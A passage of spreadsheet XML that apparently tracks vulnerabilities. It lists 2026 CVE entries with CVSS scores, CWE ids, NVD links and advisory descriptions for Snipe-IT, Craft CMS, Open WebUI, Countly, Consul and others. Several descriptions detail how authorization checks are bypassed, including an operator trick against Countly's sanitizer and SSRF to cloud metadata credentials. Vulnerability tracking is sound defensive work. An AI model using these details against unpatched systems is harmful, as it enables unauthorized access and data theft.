      <c r="C3327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3327" s="5" t="inlineStr"/>
      <c r="F3327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3327" s="5" t="inlineStr"/>
      <c r="H3327" s="5" t="inlineStr"/>
      <c r="I3327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3327" s="5" t="inlineStr"/>
      <c r="K3327" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3327" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions 5.0.0-RC1 through 5.10.11 are missing an admin-target guard in UsersController::actionActivateUser (the users/activate-user action). While the action requires the administrateUsers permission, it does not call requireAdmin() when the targeted user is an administrator, unlike the mirror action actionDeactivateUser. As a result, an authenticated control panel user who is not an administrator but holds the administrateUsers permission can activate a pending or deliberately deactivated administrator account, which can lead to permission escalation when combined with resetting that account's password. The issue is fixed in Craft CMS 5.10.12.</t>
        </is>
      </c>
      <c r="M3327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t>
        </is>
      </c>
    </row>
    <row r="3328">
      <c r="A3328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86734</t>
        </is>
      </c>
      <c r="C3328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3328" s="5" t="inlineStr"/>
      <c r="F3328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3328" s="5" t="inlineStr"/>
      <c r="H3328" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I3328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3328" s="5" t="inlineStr"/>
      <c r="K3328" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3328" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.1 fails to validate the length of the note field in the POST /account/accept/{acceptance} endpoint, allowing authenticated users to submit unbounded input that reaches synchronous CommonMark rendering. Attackers can submit large note values to exhaust PHP worker CPU and cause denial of service through resource exhaustion in the markdown parsing pipeline.</t>
        </is>
      </c>
      <c r="M3328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t>
        </is>
      </c>
    </row>
    <row r="3329">
      <c r="A3329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="C3329" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3329" s="5" t="inlineStr"/>
      <c r="F3329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3329" s="5" t="inlineStr"/>
      <c r="H3329" s="5" t="inlineStr"/>
      <c r="I3329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3329" s="5" t="inlineStr"/>
      <c r="K3329" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3329" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="M3329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="3330">
      <c r="A3330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="C3330" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3330" s="5" t="inlineStr"/>
      <c r="F3330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3330" s="5" t="inlineStr"/>
      <c r="H3330" s="5" t="inlineStr"/>
      <c r="I3330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3330" s="5" t="inlineStr"/>
      <c r="K3330" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3330" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="M3330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="3331">
      <c r="A3331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="C3331" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3331" s="5" t="inlineStr"/>
      <c r="F3331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3331" s="5" t="inlineStr"/>
      <c r="H3331" s="5" t="inlineStr"/>
      <c r="I3331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3331" s="5" t="inlineStr"/>
      <c r="K3331" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3331" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="M3331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="3332">
      <c r="A3332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86764</t>
        </is>
      </c>
      <c r="C3332" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3332" s="5" t="inlineStr"/>
      <c r="F3332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3332" s="5" t="inlineStr"/>
      <c r="H3332" s="5" t="inlineStr"/>
      <c r="I3332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3332" s="5" t="inlineStr"/>
      <c r="K3332" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3332" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.4 (fixed in 8.7.0) does not enforce the components.view permission on the authenticated endpoint GET /api/v1/hardware/&lt;asset-id&gt;/assigned/components. The endpoint authorizes only assets.view on the parent asset before returning linked component details; the components.view check is applied only to the response's available_actions.view flag and not to the returned data. As a result, an authenticated user holding only assets.view can enumerate component IDs, names, assigned quantities, and notes that are otherwise protected — the direct GET /api/v1/components/&lt;id&gt; endpoint correctly returns 403 Forbidden for such users.</t>
        </is>
      </c>
      <c r="M3332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86764</t>
        </is>
      </c>
    </row>
    <row r="3333">
      <c r="A3333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="C3333" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3333" s="5" t="inlineStr"/>
      <c r="F3333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3333" s="5" t="inlineStr"/>
      <c r="H3333" s="5" t="inlineStr"/>
      <c r="I3333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3333" s="5" t="inlineStr"/>
      <c r="K3333" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3333" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="M3333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="3334">
      <c r="A3334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="C3334" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3334" s="5" t="inlineStr"/>
      <c r="F3334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3334" s="5" t="inlineStr"/>
      <c r="H3334" s="5" t="inlineStr"/>
      <c r="I3334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3334" s="5" t="inlineStr"/>
      <c r="K3334" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3334" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="M3334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="3335">
      <c r="A3335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="C3335" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3335" s="5" t="inlineStr"/>
      <c r="F3335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3335" s="5" t="inlineStr"/>
      <c r="H3335" s="5" t="inlineStr"/>
      <c r="I3335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3335" s="5" t="inlineStr"/>
      <c r="K3335" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3335" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M3335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="3336">
      <c r="A3336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87803</t>
        </is>
      </c>
      <c r="C3336" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3336" s="5" t="inlineStr"/>
      <c r="F3336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3336" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3336" s="5" t="inlineStr"/>
      <c r="I3336" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3336" s="5" t="inlineStr"/>
      <c r="K3336" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3336" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass vulnerability exists in the Countly Server DBViewer due to flawed sub-pipeline detection in the aggregation stage sanitizer. The /o/db aggregation endpoint parses user-controlled aggregation JSON and passes it through a stage sanitizer that determines whether a nested array is a sub-pipeline by checking if every element contains a key present in a hardcoded KNOWN_STAGE_OPERATORS set. If any element contains an unrecognized stage key, such as the undocumented MongoDB-internal $_internalInhibitOptimization, the sanitizer misclassifies the entire branch as a generic array and skips stage-level stripping for all sibling stages. This allows a non-admin user with DBViewer read permission to inject forbidden operators like $lookup inside $facet sub-pipelines, performing cross-collection joins into restricted collections. This leads to unauthorized read access to sensitive data including password-reset tokens (prid), enabling account takeover.</t>
        </is>
      </c>
      <c r="M3336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87803</t>
        </is>
      </c>
    </row>
    <row r="3337">
      <c r="A3337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87809</t>
        </is>
      </c>
      <c r="C3337" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3337" s="5" t="inlineStr"/>
      <c r="F3337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3337" s="5" t="inlineStr"/>
      <c r="H3337" s="5" t="inlineStr"/>
      <c r="I3337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3337" s="5" t="inlineStr"/>
      <c r="K3337" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3337" s="5" t="inlineStr">
        <is>
          <t>Siyuan before v3.8.2 fails to apply publish-access filtering to embedded blocks before rendering in the /api/export/preview and /api/lute/copyStdMarkdown endpoints. Attackers with reader access can retrieve the full rendered content of private, hidden, or publish-disabled blocks by accessing public documents containing embed queries that select those blocks.</t>
        </is>
      </c>
      <c r="M3337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87809</t>
        </is>
      </c>
    </row>
    <row r="3338">
      <c r="A3338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="C3338" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3338" s="5" t="inlineStr"/>
      <c r="F3338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3338" s="5" t="inlineStr">
        <is>
          <t>oracle, python</t>
        </is>
      </c>
      <c r="H3338" s="5" t="inlineStr"/>
      <c r="I3338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3338" s="5" t="inlineStr"/>
      <c r="K3338" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3338"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M3338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="3339">
      <c r="A3339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87821</t>
        </is>
      </c>
      <c r="C3339" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3339" s="5" t="inlineStr"/>
      <c r="F3339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3339" s="5" t="inlineStr"/>
      <c r="H3339" s="5" t="inlineStr"/>
      <c r="I3339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3339" s="5" t="inlineStr"/>
      <c r="K3339" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3339" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard through 1.3.1 contains a server-side request forgery vulnerability in the POST /api/admin/builder/markdown/fetch endpoint that allows any authenticated user to fetch arbitrary URLs and read the response body. Attackers can read internal HTTP services and cloud metadata including IAM credentials by supplying malicious URLs without host validation or redirect restrictions.</t>
        </is>
      </c>
      <c r="M3339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87821</t>
        </is>
      </c>
    </row>
    <row r="3340">
      <c r="A3340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87961</t>
        </is>
      </c>
      <c r="C3340" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3340" s="5" t="inlineStr"/>
      <c r="F3340" s="5" t="inlineStr"/>
      <c r="G3340" s="5" t="inlineStr"/>
      <c r="H3340" s="5" t="inlineStr"/>
      <c r="I3340" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3340" s="5" t="inlineStr"/>
      <c r="K3340" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3340" s="5" t="inlineStr">
        <is>
          <t>ESP32-audioI2S versions 3.4.4 through 4.0.0 contain a heap-based out-of-bounds read vulnerability in the read_ID3_Header function due to a shadowed length parameter in ID3 synchronized-lyrics processing. Attackers can craft malicious MP3 files or HTTP audio streams with oversized frame size declarations to read past allocated buffer boundaries, causing device crashes or exposing adjacent heap memory.</t>
        </is>
      </c>
      <c r="M3340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87961</t>
        </is>
      </c>
    </row>
    <row r="3341">
      <c r="A3341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="C3341" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3341" s="5" t="inlineStr"/>
      <c r="F3341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3341" s="5" t="inlineStr"/>
      <c r="H3341" s="5" t="inlineStr"/>
      <c r="I3341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3341" s="5" t="inlineStr"/>
      <c r="K3341" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L3341" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M3341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="3342">
      <c r="A3342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="C3342" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3342" s="5" t="inlineStr"/>
      <c r="F3342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3342" s="5" t="inlineStr">
        <is>
          <t>python, azure</t>
        </is>
      </c>
      <c r="H3342" s="5" t="inlineStr"/>
      <c r="I3342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3342" s="5" t="inlineStr"/>
      <c r="K3342" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3342" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M3342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="3343">
      <c r="A3343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88016</t>
        </is>
      </c>
      <c r="C3343" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3343" s="5" t="inlineStr"/>
      <c r="F3343" s="5" t="inlineStr"/>
      <c r="G3343" s="5" t="inlineStr"/>
      <c r="H3343" s="5" t="inlineStr"/>
      <c r="I3343" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3343" s="5" t="inlineStr"/>
      <c r="K3343" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-59</t>
        </is>
      </c>
      <c r="L3343"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M3343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88016</t>
        </is>
      </c>
    </row>
    <row r="3344">
      <c r="A3344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88021</t>
        </is>
      </c>
      <c r="C3344" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3344" s="5" t="inlineStr"/>
      <c r="F3344" s="5" t="inlineStr"/>
      <c r="G3344" s="5" t="inlineStr"/>
      <c r="H3344" s="5" t="inlineStr"/>
      <c r="I3344" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3344" s="5" t="inlineStr"/>
      <c r="K3344" s="5" t="inlineStr">
        <is>
          <t>CWE-185</t>
        </is>
      </c>
      <c r="L3344" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to an authorization bypass in the Connect service mesh that may allow a service to reach a destination it is not authorized to access. When building Envoy RBAC rules to enforce Connect intentions, Consul did not correctly escape certain characters in service names, namespaces, and partitions, causing the generated authorization rules to match more broadly than intended. This vulnerability (CVE-2026-88021) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M3344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88021</t>
        </is>
      </c>
    </row>
    <row r="3345">
      <c r="A3345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88026</t>
        </is>
      </c>
      <c r="C3345" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3345" s="5" t="inlineStr"/>
      <c r="F3345" s="5" t="inlineStr"/>
      <c r="G3345" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3345" s="5" t="inlineStr"/>
      <c r="I3345" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3345" s="5" t="inlineStr"/>
      <c r="K3345" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3345" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of regular-expression metacharacters in the LINQ query translation component of the MongoDB C# Driver can cause a caller-supplied character sequence to alter a regular-expression predicate generated by an affected application. An authenticated user who can influence such a value may cause the application to return records beyond those intended by the original filter.</t>
        </is>
      </c>
      <c r="M3345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88026</t>
        </is>
      </c>
    </row>
    <row r="3346">
      <c r="A3346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88027</t>
        </is>
      </c>
      <c r="C3346" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3346" s="5" t="inlineStr"/>
      <c r="F3346" s="5" t="inlineStr"/>
      <c r="G3346" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3346" s="5" t="inlineStr"/>
      <c r="I3346" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3346" s="5" t="inlineStr"/>
      <c r="K3346" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3346" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the embedded-document relation handling of the MongoDB integration for Laravel can cause a caller-supplied embedded record identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence such an identifier may delete all embedded documents in a targeted record or overwrite an embedded document other than the intended target.</t>
        </is>
      </c>
      <c r="M3346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88027</t>
        </is>
      </c>
    </row>
    <row r="3347">
      <c r="A3347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88028</t>
        </is>
      </c>
      <c r="C3347" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3347" s="5" t="inlineStr"/>
      <c r="F3347" s="5" t="inlineStr"/>
      <c r="G3347" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3347" s="5" t="inlineStr"/>
      <c r="I3347" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3347" s="5" t="inlineStr"/>
      <c r="K3347" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3347" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the polymorphic relation handling of the MongoDB integration for Laravel can cause a caller-supplied relation identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence a stored relation identifier may cause an affected application to return a document other than the intended relation target.</t>
        </is>
      </c>
      <c r="M3347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88028</t>
        </is>
      </c>
    </row>
    <row r="3348">
      <c r="A3348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88870</t>
        </is>
      </c>
      <c r="C3348" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3348" s="5" t="inlineStr"/>
      <c r="F3348" s="5" t="inlineStr"/>
      <c r="G3348" s="5" t="inlineStr"/>
      <c r="H3348" s="5" t="inlineStr"/>
      <c r="I3348" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3348" s="5" t="inlineStr"/>
      <c r="K3348" s="5" t="inlineStr">
